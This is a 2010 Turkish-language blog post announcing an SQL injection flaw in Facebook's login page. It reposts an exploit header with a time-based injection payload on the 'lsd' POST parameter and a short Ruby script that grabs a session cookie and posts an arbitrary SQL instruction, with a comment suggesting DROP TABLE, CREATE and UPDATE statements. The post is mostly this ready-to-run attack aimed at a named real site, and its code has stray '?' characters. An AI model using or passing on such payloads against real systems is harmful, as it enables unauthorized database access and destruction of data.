24 Haziran 2010 Perşembe

Facebook login.php Sql Injection Açığı....

Facebook logo
Facebook sitesinin login.php sayfasında sql açığı bulunduğu tespit edilmiştir. Bu açık ile ilgili bilgiler aşağıda verilmiştir.



# SQL Injection
# Path Sensitive : https://login.facebook.com/login.php?login_attempt=1
# Fault Find By Gsk | Whivack
# Code By, Gsk | Whivack
# Variable POST Sensitive : lsd
# Thanks Team Guru-Security-Klan (gsk2.fr) and Inj3ct0r.com (Exploit Database) by r0073r
# Contact Me : whivackwdcompany@gmail.com (French)
# Useful Software : Ruby 1.8.6
# Download Ruby 1.8.6 : http://www.ruby-lang.org
# Demonstration Command : lsd=hUwMm%27%29%3Bwaitfor+delay+%270%3A0%3A15%27%3B--
# Result Command : 
Bu açık ile ilgili ruby kodu aşağıdadır.

require 'net/http'
require 'net/https'

http = Net::HTTP.new('login.facebook.com', 443)
http.use_ssl = true
path = '/login.php'
resp, data = http.get(path, nil)
cookie = resp.response['set-cookie']

# DROP TABLE ... CREATE TABLE ... CREATE VIEW ... UDPATE ...
data = "lsd=%27[SQL Instruction]--"

headers = {
? 'Cookie' => cookie,
? 'Referer' => 'https://login.facebook.com/login.php',
? 'Content-Type' => 'application/x-www-form-urlencoded'
}
resp, data = http.post(path, data, headers)
puts 'Code = ' + resp.code
Enhanced by Zemanta

0 yorum:

Paylaş

Twitter Delicious Facebook Digg Stumbleupon Favorites